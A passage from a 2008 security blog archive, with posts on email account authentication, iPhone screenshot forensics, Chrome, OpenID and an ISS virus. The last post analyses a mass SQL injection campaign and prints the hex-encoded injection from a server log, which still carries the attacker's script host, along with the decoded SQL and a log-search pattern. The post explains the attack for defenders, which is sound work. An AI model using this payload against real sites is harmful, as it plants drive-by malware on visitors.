both innocuous and sensitive - among people. The fact that it's not the best mechanism for doing so ignores the fact that it's how people do things. There are a variety of options available to help ensure only authorized users can get access to email accounts. The fact they are not regularly implemented is a sad state of affairs.<br /> </p> <p style="clear: both"> There are many options to strengthen the identification and authentication processes. We can't discuss them all here, but a couple on my mind are described below. </p> <p style="clear: both"> <b>Physical tokens -</b> Making the jump from only having to remember a user name (which is usually the email address, so hardly a secret ) and a password to a scheme where one must carry a token and provide information from it in order to log in is quite a leap (carrying yet another piece of technology around doesn't exactly appeal to me), but it works. The costs associated with fulfilling, supporting and maintaining such a system are very real, and for Yahoo! may not be realistic. But there are systems available to those who know and choose to use them that can substially improve your authentication profile. Check out <a href="http://www.shahine.com/omar/TwoFactorAuthenticationForTheRestOfUs.aspx" target="_blank">Omar Shahine's recent blog entry</a> describing how he's securing his accounts in a few ways, including with an OpenID-integrated single-sign-on token system <a href="https://pip.verisignlabs.com/" target="_blank">from Verisign</a>.<br /> </p> <p style="clear: both"> But, even if you use an OpenID to sign in, what if your OpenID is a Yahoo! ID or other identity that you can reset with a single piece of discoverable knowledge? It still needs to be protected from unauthorized changes and access.<br /> </p> <p style="clear: both"> How to do that? There are several ways. I have a couple of favorites, but please feel free to share yours. </p> <p style="clear: both"> <b>Require security changes to take place out of band -</b> One option, probably quicker and less expensive to implement than physical tokens, is using something like an automated telephone call or text message to require the owner of the account to verify a change should be allowed. By registering one or more phone numbers when the account is created and requiring a unique secret be provided via that channel to authorize a change, one can sufficiently secure the account. <a href="http://www.vidoop.com" target="_blank">Vidoop</a> uses a system like this for resetting information on their OpenID accounts. It's simple and it works. It requires me to have the correct device (my phone), uses a different communication channel (the phone network, hence "out-of-band") to contact me and then verifies I am a legitimate user. It requires me to interact as part of any change.<br /> </p> <p style="clear: both"> But the technology options get even better: JanRain's <a href="http://www.myopenid.com" target="_blank">myOpenID,</a> for example, now has <a href="https://www.myopenid.com/about_callverifid" title="" target="_blank">a feature called "CallVerfID"</a> that equips your myOpenID for two-factor authentication via the phone. It's quick and easy to set up and instantly protects every login with a multifactor authentication mechanism. I found I was not able to use it with a couple phone services due to the way they answer the call (I should provide feedback about that, added to my to-do list), but when set up for my cell or home phone it works as advertised. <br /> </p> <p style="clear: both"> Expect more of this class of technology in the future. Think, for example, about voice biometrics: Is that really you that's answering your phone? That kind of technology would be very cool if it was reliable. It's a complicated but useful technology that's being refined even as we discuss this.<br /> </p> <p style="clear: both"> I would guess that "review of all Internet email accounts" has been added to every campaign manager's list of things to do deal with early in the vetting process (not to mention the Secret Service's list). Any of the technologies above would likely have prevented the malicious bad guy from accessing the Yahoo! email account. <br /> </p> <p style="clear: both"> In the security world, change only happens when enough people make enough noise, a regulator gives an order, or enough companies feel enough financial pain. This looks like one of those cases where noise is the better option. It's certainly better than regulatory mandates (which tend to create collateral damage), and waiting on big companies to suffer is not exactly a reliable plan. </p> <p style="clear: both"> So... Feeling okay? How safe is your account, really? </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,b4ec40c9-c6f2-47e9-bb2b-d4e3f15fc5ac.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=608c1429-0b5b-42c0-b31b-9c9614e6bce8 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,608c1429-0b5b-42c0-b31b-9c9614e6bce8.aspx http://www.greghughes.net/rant/CommentView,guid,608c1429-0b5b-42c0-b31b-9c9614e6bce8.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=608c1429-0b5b-42c0-b31b-9c9614e6bce8 4

Over at Wired's Gadget Labs blog, Brian Chen writes about information discovered during a webcast presentation on Thursday covering the recently discussed iPhone security weaknesses having to do with bypassing the password-protected lock screen.

Jonathan Zdziarski, a data forensics expert and author of the forthcoming book "iPhone Forensics," did the presentation for law enforcement personnel and anyone else who might have a need to access an iPhone to discover information. During the presentation, in which he outlines a method for breaking into the phone with modified firmware and some hairy manipulation, he also showed how the iPhone takes a screenshot of every application the iPhone's user closes by pressing the "home" button. The saved image is used to "draw" the collapsing screen animation you see when your application closes and you're returned to the home screen. The image file is then deleted from the iPhone's storage.

But, nothing is ever really completely "deleted." And in this case, apparently when the temporary image file is killed from storage, the data "on-disk" is not overwritten or otherwise cleaned, so anyone with some basic forensics knowledge can search the iPhone storage space for the old files and recover them easily. You can do the same thing on pretty much any computer.

Depending on your point of view, this is either a potential privacy issue or a great forensics feature. Having worked as both a police officer and as a business security professional responsible for privacy and data integrity issues, I can understand both arguments. Certainly as a cop, being able to dig into someone's iPhone (with a proper warrant of course) to find evidence of crimes where the phone was used in some manner is of real value, and screen shots are potentially pretty useful evidence. But as a person who also values privacy as a matter of basic principle, it's a little disconcerting, especially since I didn't realize until today screen shots are being made.

The webcast recording is not yet available as of the time of this writing, but it should be posted to http://www.youtube.com/OreillyMedia in the next few days. If you're interested in learning something about electronic data forensics, it will be worth the time to check it out. Here's the O'Reilly abstract from the session:

In this free, live webcast, iPhone hacker and data forensics expert Jonathan Zdziarski guides you through the steps used by law enforcement agencies to bypass the iPhone 3G's passcode lock by creating a custom firmware bundle. Author of the upcoming book, iPhone Forensics , Jonathan has devoted much of his talent supporting law enforcement personnel with his development of a forensics toolkit that allows them to recover, process, and remove sensitive data stored on the iPhone, iPhone 3G, and iPod Touch. This live presentation is aimed towards law enforcement and anyone else who has a need to access the not-so-readily available data on an iPhone.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Privacy flaw or useful feature? Your iPhone is "watching" you http://www.greghughes.net/rant/PermaLink,guid,608c1429-0b5b-42c0-b31b-9c9614e6bce8.aspx http://www.greghughes.net/rant/PrivacyFlawOrUsefulFeatureYourIPhoneIsWatchingYou.aspx Fri, 12 Sep 2008 04:58:55 GMT <p style="clear: both"> Over at Wired's Gadget Labs blog, <a href="http://blog.wired.com/gadgets/2008/09/hacker-says-sec.html" title="" target="_blank">Brian Chen writes</a> about information discovered during a webcast presentation on Thursday covering the recently discussed iPhone security weaknesses having to do with bypassing the password-protected lock screen.<br /> </p> <p style="clear: both"> Jonathan Zdziarski, a data forensics expert and author of the forthcoming book "iPhone Forensics," did the presentation for law enforcement personnel and anyone else who might have a need to access an iPhone to discover information. During the presentation, in which he outlines a method for breaking into the phone with modified firmware and some hairy manipulation, he also showed how the iPhone takes a screenshot of every application the iPhone's user closes by pressing the "home" button. The saved image is used to "draw" the collapsing screen animation you see when your application closes and you're returned to the home screen. The image file is then deleted from the iPhone's storage.<br /> </p> <p style="clear: both"> But, nothing is ever really completely "deleted." And in this case, apparently when the temporary image file is killed from storage, the data "on-disk" is not overwritten or otherwise cleaned, so anyone with some basic forensics knowledge can search the iPhone storage space for the old files and recover them easily. You can do the same thing on pretty much any computer.<br /> </p> <p style="clear: both"> Depending on your point of view, this is either a potential privacy issue or a great forensics feature. Having worked as both a police officer and as a business security professional responsible for privacy and data integrity issues, I can understand both arguments. Certainly as a cop, being able to dig into someone's iPhone (with a proper warrant of course) to find evidence of crimes where the phone was used in some manner is of real value, and screen shots are potentially pretty useful evidence. But as a person who also values privacy as a matter of basic principle, it's a little disconcerting, especially since I didn't realize until today screen shots are being made.<br /> </p> <p style="clear: both"> The webcast recording is not yet available as of the time of this writing, but it should be posted to <a href="http://www.youtube.com/OreillyMedia" target="_blank">http://www.youtube.com/OreillyMedia</a> in the next few days. If you're interested in learning something about electronic data forensics, it will be worth the time to check it out. Here's the O'Reilly abstract from the session:<br /> </p> <blockquote style="clear: both"> <p> <i>In this free, live webcast, iPhone hacker and data forensics expert </i><a href="http://www.oreillynet.com/pub/au/1861"><i>Jonathan Zdziarski</i></a><i> guides you through the steps used by law enforcement agencies to bypass the iPhone 3G's passcode lock by creating a custom firmware bundle. Author of the upcoming book, </i><a href="http://oreilly.com/catalog/9780596153892/"><strong><i>iPhone Forensics</i></strong></a><i>, Jonathan has devoted much of his talent supporting law enforcement personnel with his development of a forensics toolkit that allows them to recover, process, and remove sensitive data stored on the iPhone, iPhone 3G, and iPod Touch. This live presentation is aimed towards law enforcement and anyone else who has a need to access the not-so-readily available data on an iPhone.</i> </p> </blockquote> <p style="clear: both"> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,608c1429-0b5b-42c0-b31b-9c9614e6bce8.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=5a784293-8605-4438-82c3-8b106efccd59 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,5a784293-8605-4438-82c3-8b106efccd59.aspx http://www.greghughes.net/rant/CommentView,guid,5a784293-8605-4438-82c3-8b106efccd59.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=5a784293-8605-4438-82c3-8b106efccd59

Google seeded a paper comic book to some people recently, to present and describe their future web browser (or you might just think of it as the web browser of the future), which is called Google Browser or Chrome.


So, what's the story? Making the browser more stable, more usable, more secure. At first glance, it looks like a strong starting point for the future of Internet browsers. Written from the ground-up from scratch and with the experience of several years of past browser platforms to learn from, Google has addressed many of the main concerns in today's browsers.

Now the only question is: When will we get it? I will be watching here to see if something shows up. Hopefully it's soon!

UPDATE: The release date is tomorrow (Tuesday, September 2, 2008) - More info and link to screenshots here.

A variety of technologies are incorporated into the Chrome design that improve on common browser weaknesses. The key improvements fall into the areas of stability (memory allocation and management, process management), some incredibly cool javascript environment enhancements (in the form of a new, open-source javascript engine), a bunch of user experience improvements and significant security changes.

And, it's all open source. That's right - Anyone (including other browser makers) can leverage the work done in the Chrome project and can contribute or modify to meet their own needs. Good move, Google.


Pretty exciting stuff. It will be fun to see what comes next, and when.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Google's Dream Browser, Chrome: Coming soon to your computer http://www.greghughes.net/rant/PermaLink,guid,5a784293-8605-4438-82c3-8b106efccd59.aspx http://www.greghughes.net/rant/GooglesDreamBrowserChromeComingSoonToYourComputer.aspx Mon, 01 Sep 2008 18:57:24 GMT <p style="clear: both;"> Google <a href="http://blogoscoped.com/google-chrome/" target="_blank">seeded a paper comic book</a> to some people recently, to present and describe their future web browser (or you might just think of it as the web browser of the future), which is called Google Browser or Chrome.<br> </p> <p style="clear: both;"> <a href="http://www.greghughes.net/rant/content/binary/screen-chrome-comic3.jpg"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/screen-chrome-comic2.jpg" style="margin: 0pt auto; text-align: center; display: block;" align="" height="227" width="453"></a> <br style="clear: both;"> So, what's the story? Making the browser more stable, more usable, more secure. At first glance, it looks like a strong starting point for the future of Internet browsers. Written from the ground-up from scratch and with the experience of several years of past browser platforms to learn from, Google has addressed many of the main concerns in today's browsers.<br> </p> <p style="clear: both;"> Now the only question is: When will we get it? I will be <a href="http://blogoscoped.com/google-chrome/34" target="_blank">watching here</a> to see if something shows up. Hopefully it's soon! <br> </p> <blockquote> <p style="clear: both;"> <i><b>UPDATE: </b>The release date is tomorrow (Tuesday, September 2, 2008) - <a href="http://www.greghughes.net/rant/MoreOnChromeOfficialGoogleAnnouncementAndScreenshots.aspx">More info and link to screenshots here</a>.</i> <br> </p> </blockquote> <p style="clear: both;"> A variety of technologies are incorporated into the Chrome design that improve on common browser weaknesses. The key improvements fall into the areas of <a href="http://blogoscoped.com/google-chrome/3" target="_blank">stability</a> (memory allocation and management, process management), some incredibly <a href="http://blogoscoped.com/google-chrome/12" target="_blank">cool javascript environment enhancements</a> (in the form of a new, open-source javascript engine), a bunch of <a href="http://blogoscoped.com/google-chrome/18" title="" target="_blank">user experience improvements</a> and <a href="http://blogoscoped.com/google-chrome/25" target="_blank">significant security changes</a>. <br> </p> <p style="clear: both;"> And, it's all <a href="http://blogoscoped.com/google-chrome/34" target="_blank">open source</a>. That's right - Anyone (including other browser makers) can leverage the work done in the Chrome project and can contribute or modify to meet their own needs. Good move, Google.<br> </p> <p style="clear: both;"> <a href="http://www.greghughes.net/rant/content/binary/chrome-capture2.jpg"><img class="linked-to-original" src="http://www.greghughes.net/rant/content/binary/chrome-capture1.jpg" style="margin: 0pt auto; text-align: center; display: block;" height="337" width="450"></a> <br style="clear: both;"> Pretty exciting stuff. It will be fun to see what comes next, and when.<br> <br> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,5a784293-8605-4438-82c3-8b106efccd59.aspx IT Security Safe Computing Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=a8e20d83-d90f-49ae-9189-d0debc4a3707 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,a8e20d83-d90f-49ae-9189-d0debc4a3707.aspx http://www.greghughes.net/rant/CommentView,guid,a8e20d83-d90f-49ae-9189-d0debc4a3707.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=a8e20d83-d90f-49ae-9189-d0debc4a3707 1

Vidoop Labs has a dream:

The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert validation ). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.

I could get into that.

Vidoop is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining openID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.

Vidoop's Luke Sontag today posted an announcement that the company's newly-formed Vidoop Labs has fired up a community project called IDIB (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.

From the Vidoop announcement:

Over the past few years we’ve seen the adoption of OpenID continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, its clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.

It was almost two years ago when the Firefox 3.0 roadmap was
announced and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.

In light of that missed opportunity,
Vidoop Labs has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.

And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.

The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. Vidoop Labs launches Identity in the Browser (IDIB) dream project http://www.greghughes.net/rant/PermaLink,guid,a8e20d83-d90f-49ae-9189-d0debc4a3707.aspx http://www.greghughes.net/rant/VidoopLabsLaunchesIdentityInTheBrowserIDIBDreamProject.aspx Fri, 29 Aug 2008 07:18:19 GMT <p style="clear: both; "> Vidoop Labs has a dream:<br /> </p> <blockquote style="clear: both"><i>The dream is to see Identity baked into all browsers. Just imagine opening your web browser and then selecting your Identity Provider (IDP) the way you select your default search provider. The benefits are numerous; never type in a username, never look for a login button/page (you are authenticated when you land on a domain), no phishing/MITM (the browser can do domain and SSL cert </i><a href="http://www.cs.cmu.edu/~perspectives/" target="_blank"><i>validation</i></a><i>). You fire up your browser and authenticate (or login) similar to the way you log in to your computer every time you turn it on. The difference is you get to choose your provider and can take control of the data you safeguard, store and share on the Internet.</i></blockquote> <p style="clear: both; "> I could get into that. <br /> <br /> <a href="http://www.vidoop.com/" target="_blank">Vidoop</a> is a Portland, Oregon company that has built some interesting technology around OpenID. I really like the idea of OpenID, and I have a couple OpenIDs of my own that I use on various sites. But OpenID is not exactly perfect. It's still relatively young, and from the usability standpoint it needs improvement. The identity and authentication requirements of the modern Internet demand some additional features and capabilities that OpenID doesn't deliver (and you can argue that it shouldn't). By combining openID with other technologies (such as Information Cards and other strong-auth offerings) and improving usability for end-users, it could become a widely-adopted, used and trusted standard, or part of a broader one covering strong authentication and identity protection/assertion in a commonly-accepted and deployed package.<br /> </p> <p style="clear: both; "> Vidoop's <a href="http://blog.vidoop.com/archives/163" target="_blank">Luke Sontag today posted an announcement</a> that the company's newly-formed <a href="http://labs.vidoop.com/" target="_blank">Vidoop Labs</a> has fired up <a href="http://labs.vidoop.com/identity-in-the-browser-idib/" target="_blank">a community project called IDIB</a> (pronounced "Eye-Dib"), which aims to improve on the OpenID usability model and make it stronger at the same time. They've released a developer preview of IDIB in hopes of involving people and getting your input and feedback.<br /> </p> <p style="clear: both; "> From the Vidoop announcement: </p> <blockquote style="clear: both">O<i>ver the past few years we’ve seen the adoption of </i><a href="http://openid.net/" title="OpenID Community Site" target="_blank"><i>OpenID</i></a><i> continue to increase but the work that we’ve done as a community to develop this technology has only just begun. Looking at the landscape of OpenID adoption, its clear that there are several key factors inhibiting adoption, but two that we want to focus on today, namely usability and security in the browser.<br /> <br /> It was almost two years ago when the Firefox 3.0 roadmap was</i><a href="http://radar.oreilly.com/2007/01/firefox-30-requirements-are-ou.html" title="Firefox 3.0 Requirements are out" target="_blank"><i>announced</i></a><i> and OpenID was mentioned as a new component to the platform. The Mozilla Firefox team looked to members of the OpenID community to step up and provide guidance on what exactly we imagined identity in the browser looking like, but we failed to mobilize and answer their call.<br /> <br /> In light of that missed opportunity, </i><a href="http://labs.vidoop.com/" title="Vidoop Labs"><i>Vidoop Labs</i></a><i> has been working hard over the last several weeks to produce a prototype that we intend to use to initiate a wider discussion about OpenID in the browser and what it might look like.</i></blockquote> <p style="clear: both; "> And the current developer preview (which is open-source) is just a beginning. Imagine leveraging Information Cards (such as one would use with Microsoft's CardSpace, or the similar open-source offerings for Mac and Linux) in the cloud, and being able to use OpenID - one logon for all your web sites - confidently, securely and with proper security protection.<br /> </p> <p style="clear: both; "> The Internet needs a good, strong, reliable, usable and secure standard technology to solve the issues related to user names, passwords, single sign on and identity protection. IDIB looks like a serious and positive attempt to start the journey directly down that path. </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,a8e20d83-d90f-49ae-9189-d0debc4a3707.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=f18489c9-ff4d-444b-898e-8a90c87d7880 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,f18489c9-ff4d-444b-898e-8a90c87d7880.aspx http://www.greghughes.net/rant/CommentView,guid,f18489c9-ff4d-444b-898e-8a90c87d7880.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=f18489c9-ff4d-444b-898e-8a90c87d7880 Well, this is a little embarrassing. Intergalactic malware has made it's way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.

Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.

But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.

The author of that virus has something new to brag about, though. That's for sure.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. NASA shoots a computer virus into space http://www.greghughes.net/rant/PermaLink,guid,f18489c9-ff4d-444b-898e-8a90c87d7880.aspx http://www.greghughes.net/rant/NASAShootsAComputerVirusIntoSpace.aspx Thu, 28 Aug 2008 04:01:30 GMT Well, <a href="http://news.bbc.co.uk/2/hi/technology/7583805.stm">this is a little embarrassing</a>. Intergalactic malware has made it's way into the news. A computer virus on the International Space Station. No AV software on the laptops they use, nor (apparently) is there a process of security checks on personal computer equipment like USB thumb drives carried by astronauts being rocketed to the International Space Station.<br> <br> Granted, the virus in question in this case is pretty innocuous, and apparently other viruses that have made it into space aboard computer gear in the past (it's really quite difficult to mention that in passing) have also been more of an inconvenience than a real security threat.<br> <br> But imagine a virus that might make its way on-board and do more damage. Not good. It looks like it's time for some effective process and possibly some basic security technology - You know, just in case.<br> <br> The author of that virus has something new to brag about, though. That's for sure.<br> <p> </p> <br /> <hr /> <font size="1">greghughes.net weblog - copyright 2009 - licensed under a <a href="http://creativecommons.org/licenses/by-nc-sa/2.0/">Creative Commons License</a>.</font> http://www.greghughes.net/rant/CommentView,guid,f18489c9-ff4d-444b-898e-8a90c87d7880.aspx IT Security Tech
http://www.greghughes.net/rant/Trackback.aspx?guid=c50ba4fe-59fa-4bec-8aae-49a65a7a8a84 http://www.greghughes.net/rant/pingback.aspx http://www.greghughes.net/rant/PermaLink,guid,c50ba4fe-59fa-4bec-8aae-49a65a7a8a84.aspx http://www.greghughes.net/rant/CommentView,guid,c50ba4fe-59fa-4bec-8aae-49a65a7a8a84.aspx http://www.greghughes.net/rant/SyndicationService.asmx/GetEntryCommentsRss?guid=c50ba4fe-59fa-4bec-8aae-49a65a7a8a84 3

A bunch of IT and web-app teams have lost a lot of sleep lately...

Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).

The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).

Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).

About data validation...

I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, it's the only safe way to go.

UPDATE: Neil Carpenter mentions in the comments here that he recently posted an excellent blog entry about using parametrized queries in SQL server, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.

The attack

Secure Computing's TrustedSource (good site, read it) has some detail about the attack...

You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):

GET /?';DECLARE%20@S%20CHAR(4000);SET%20@
S=CAST(0x4445434C41524520405420766172636
8617228323535292C40432076617263686172283
430303029204445434C415245205461626C655F4
37572736F7220435552534F5220464F522073656
C65637420612E6E616D652C622E6E616D6520667
26F6D207379736F626A6563747320612C7379736
36F6C756D6E73206220776865726520612E69643
D622E696420616E6420612E78747970653D27752
720616E642028622E78747970653D3939206F722
0622E78747970653D3335206F7220622E7874797
0653D323331206F7220622E78747970653D31363
729204F50454E205461626C655F437572736F722
04645544348204E4558542046524F4D202054616
26C655F437572736F7220494E544F2040542C404
3205748494C4528404046455443485F535441545
5533D302920424547494E2065786563282775706
4617465205B272B40542B275D20736574205B272
B40432B275D3D5B272B40432B275D2B2727223E3
C2F7469746C653E3C736372697074207372633D2
2687474703A2F2F73646F2E313030306D672E636
E2F63737273732F772E6A73223E3C2F736372697
0743E3C212D2D272720776865726520272B40432
B27206E6F74206C696B6520272725223E3C2F746
9746C653E3C736372697074207372633D2268747
4703A2F2F73646F2E313030306D672E636E2F637
37273732F772E6A73223E3C2F7363726970743E3
C212D2D272727294645544348204E45585420465
24F4D20205461626C655F437572736F7220494E5
44F2040542C404320454E4420434C4F534520546
1626C655F437572736F72204445414C4C4F43415
445205461626C655F437572736F72%20AS%20CHA
R(4000));EXEC(@S);HTTP/1.1

Which is a hex-encoded injection that, when translated, creates this SQL statement string (bad-guy address has been removed):

DECLARE @T varchar(255), @C varchar(4000) DECLARE Table_Cursor CURSOR FOR select a.name, b.name from sysobjects a, syscolumns b where a.id=b.id and a.xtype=’u’ and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec(’update ['+@T+'] set ['+@C +']=['+@C+']+””>

To search your web server logs for any offending lines, look for "DECLARE" anywhere in the query string. That's a dead give-away. You'll find attacks from various unsurprising countries including North Korea and China (or at least what's where I have seen them coming from).

How to solve?

First of all, if code like this can get through the web application and into the database, I'd recommend a complete review of the web app from a security standpoint. Basic best-practices for web applications assume that you will trust absolutely no input by default, and then examine all input to see if it is in a format and of a type that is appropriate. And it's very important to recognize that by "input" we mean any type of input vector - whether it be form fields, query string, URI, session data, etc. Input validation should be done on the server side, not just the client side (turning off javascript and manipulating data en-route to the server is pretty easy, after all).

If you need a tactical approach to block this particular threat right now while you plan validation improvements, I'd recommend what many people are doing: Monitor all the input with your web server, and re-write the offending statements to something innocuous. That's a band-aid, but it can help in the short-term with this one particular need. In addition, you could use application-layer firewalls in from of your web server/farm to do the same thing. But neither of these approaches would be considered acceptable as a complete or permanent solution. You can certainly keep them in place after an app fix, as part of a layered security approach. But ultimately the site needs to be coded properly and not allow the bad input.

HP recently released a tool that you can use to check for SQL injection vulnerabilities specifically called Scrawlr. You can find it, and related information, here.

Scrawlr, developed by the HP Web Security Research Group in coordination with the MSRC, is short for SQL Injector and Crawler. Scrawlr will crawl a website while simultaneously analyzing the parameters of each individual web page for SQL Injection vulnerabilities. Scrawlr is lightning fast and uses our intelligent engine technology to dynamically craft SQL Injection attacks on the fly. It can even provide proof positive results by displaying the type of backend database in use and a list of available table names. There is no denying you have SQL Injection when I can show you table names!

If you are dealing with this attack or have related thoughts, please feel free to post in the comments with your experiences.



greghughes.net weblog - copyright 2009 - licensed under a Creative Commons License. SQL Injection attacks in the wild - why they're working and what to do http://www.greghughes.net/rant/PermaLink,guid,c50ba4fe-59fa-4bec-8aae-49a65a7a8a84.aspx http://www.greghughes.net/rant/SQLInjectionAttacksInTheWildWhyTheyreWorkingAndWhatToDo.aspx Tue, 12 Aug 2008 22:24:30 GMT <p style="clear: both;"> A bunch of IT and web-app teams have lost a lot of sleep lately...<br> <br> Over the past several days, a significant number (in the thousands) of web applications, some of them well-known and well-used, have fallen victim to a distributed SQL injection attack that takes advantage of weak or non-existent input validation to inject malicious HTML code that then performs a drive-by malware attack on unsuspecting visitors. Since visitors to your site trust it, if your site has been hacked they are more likely to allow the malware to install on their computer (especially if, for example, the malware is delivered in the form of a browser helper object or something along those lines).<br> <br> The malware in question appears to steal WoW account information and insert a back-door (trojan) program on PCs it infects (among other things).<br> <br> Web sites that do not properly validate all input - and by proper I mean trust nothing by default and only allow input that specifically matches what is appropriate - and which run on a Microsoft SQL server back-end (and possibly other database servers that use the same basic table structure) are at risk. I've observed web sites running on both Apache and IIS that have been hacked, the only common thread is SQL server (despite reports to the contrary).<br> <br> <b>About data validation...</b> <br> <br> I've personally spoken with people from a few companies who have had to contend with the fact that their sites were attacked in this manner over the past several days. In each case, they were utilizing a so-called "black-list" (or "deny-list" to be a little more appropriate) of bad input in their application logic. The problem with black-listing is the cases where you don't realize something should be on the list, or when new threats emerge. Instead, a white-list (or "allow-list") methodology requires you to specify what input is allowed. Your application won't change much over time. The threats will. Deny all by default, <strike>it's the only safe way to go</strike>. <br> </p> <p style="clear: both;"> <b>UPDATE: </b>Neil Carpenter mentions in the comments here that he recently posted an excellent <a href="http://blogs.technet.com/neilcar/archive/2008/08/07/input-validation-is-not-the-answer.aspx">blog entry about using parametrized queries in SQL server</a>, and he makes some great points. While input validation is a useful and often appropriate layer of security (not all apps are database-driven), solving this specific type of problem using his method is an important idea to look at and leverage. A layered conbination of both input validation (where it's practical and workable) and paramaterized queries is a good approach, in my opinion.<br> <br> <b>The attack</b> </p> <p style="clear: both;"> <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines" target="_blank">Secure Computing's TrustedSource</a> (good site, read it) <a href="http://www.trustedsource.org/blog/142/New-SQL-Injection-Attack-Infecting-Machines" target="_blank">has some detail</a> about the attack...<br> <br> You'll see this in your web server logs (assuming you are logging, and you sure as heck better be - more on that later):<br> </p> <blockquote><pre>GET /?';DECLARE%20@S%20CHAR(4000);SET%20@ S=CAST(0x4445434C41524520405420766172636 8617228323535292C40432076617263686172283 430303029204445434C415245205461626C655F4 37572736F7220435552534F5220464F522073656 C65637420612E6E616D652C622E6E616D6520667 26F6D207379736F626A6563747320612C7379736 36F6C756D6E73206220776865726520612E69643 D622E696420616E6420612E78747970653D27752 720616E642028622E78747970653D3939206F722 0622E78747970653D3335206F7220622E7874797 